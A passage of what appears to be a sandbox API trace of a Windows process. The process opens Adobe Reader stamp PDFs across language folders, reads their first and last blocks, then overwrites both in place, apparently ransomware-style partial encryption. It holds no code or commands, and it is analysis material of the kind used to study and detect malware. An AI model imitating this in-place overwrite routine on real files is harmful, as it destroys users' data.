WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.119] ReleaseMutex (hMutex=0x168) returned 1 [0062.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0062.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88d34, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0062.120] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.122] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x14c7a [0062.122] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.123] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x14c7a [0062.123] WriteFile (in: hFile=0x1d4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.124] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0062.124] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.124] CloseHandle (hObject=0x1d4) returned 1 [0062.126] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\ENU\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\enu\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.127] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.127] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x9f16 [0062.127] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.127] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.127] ReleaseMutex (hMutex=0x168) returned 1 [0062.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7352c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0062.127] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.130] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x8f16 [0062.130] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.131] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x8f16 [0062.131] WriteFile (in: hFile=0x1d4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.132] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0062.132] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.132] CloseHandle (hObject=0x1d4) returned 1 [0062.134] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\EUQ\\SignHere.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\euq\\signhere.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0062.135] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.135] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x8c96 [0062.135] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.135] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.135] ReleaseMutex (hMutex=0x168) returned 1 [0062.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.135] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignHere.pdf", cchWideChar=12, lpMultiByteStr=0x1f7358c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignHere.pdf", lpUsedDefaultChar=0x0) returned 12 [0062.136] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.138] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7c96 [0062.138] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.139] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7c96 [0062.139] WriteFile (in: hFile=0x1d4, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.140] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0062.140] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.140] CloseHandle (hObject=0x1d4) returned 1 [0062.145] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HRV\\Pointers.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hrv\\pointers.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0062.703] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.703] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb731 [0062.703] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.703] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.704] ReleaseMutex (hMutex=0x168) returned 1 [0062.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.704] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pointers.pdf", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pointers.pdf", lpUsedDefaultChar=0x0) returned 12 [0062.716] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.744] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa731 [0062.745] ReadFile (in: hFile=0x1ec, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0062.767] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa731 [0062.767] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0062.767] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0062.767] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0062.768] CloseHandle (hObject=0x1ec) returned 1 [0062.793] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\HUN\\Standard.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\hun\\standard.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0062.793] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.793] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1c4f5 [0062.794] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0062.794] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0062.794] ReleaseMutex (hMutex=0x168) returned 1 [0062.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0062.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Standard.pdf", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Standard.pdf", lpUsedDefaultChar=0x0) returned 12 [0062.794] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eb39b8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1eb39b8*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0062.850] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1b4f5 [0062.850] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0063.923] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1b4f5 [0063.923] WriteFile (in: hFile=0x1ec, lpBuffer=0x2668b68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668b68*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0063.923] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0063.924] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0063.924] CloseHandle (hObject=0x1ec) returned 1 [0063.926] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\JPN\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\jpn\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0063.926] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0063.926] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1c005 [0063.926] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0063.927] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0063.927] ReleaseMutex (hMutex=0x168) returned 1 [0063.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0063.927] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0063.927] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ec1538, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0063.955] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1b005 [0063.955] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.010] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1b005 [0064.011] WriteFile (in: hFile=0x1ec, lpBuffer=0x2668b68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668b68*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.011] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0064.011] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea7988*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea7988*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.011] CloseHandle (hObject=0x1ec) returned 1 [0064.018] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\NOR\\Dynamic.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\nor\\dynamic.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0064.019] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.019] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xfbd7 [0064.019] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.019] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.019] ReleaseMutex (hMutex=0x168) returned 1 [0064.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Dynamic.pdf", cchWideChar=11, lpMultiByteStr=0x1f7352c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Dynamic.pdf", lpUsedDefaultChar=0x0) returned 11 [0064.019] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e980a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.032] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xebd7 [0064.033] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ec5568, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ec5568*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.064] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xebd7 [0064.064] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0064.065] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0064.065] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ec1538*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ec1538*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0064.065] CloseHandle (hObject=0x1ec) returned 1 [0064.082] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\POL\\StandardBusiness.pdf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\pol\\standardbusiness.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0064.083] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.083] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x10873 [0064.083] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0064.083] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0064.083] ReleaseMutex (hMutex=0x168) returned 1 [0064.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0064.083] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StandardBusiness.pdf", cchWideChar=20, lpMultiByteStr=0x1f88ba4, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StandardBusiness.pdf", lpUsedDefaultChar=0x0) returned 20 [0064.084] ReadFile (in: hFile=0x1ec, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0064.092] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xf873 [0064.092] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0064.099] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xf873 [0064.100] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ec1538*, 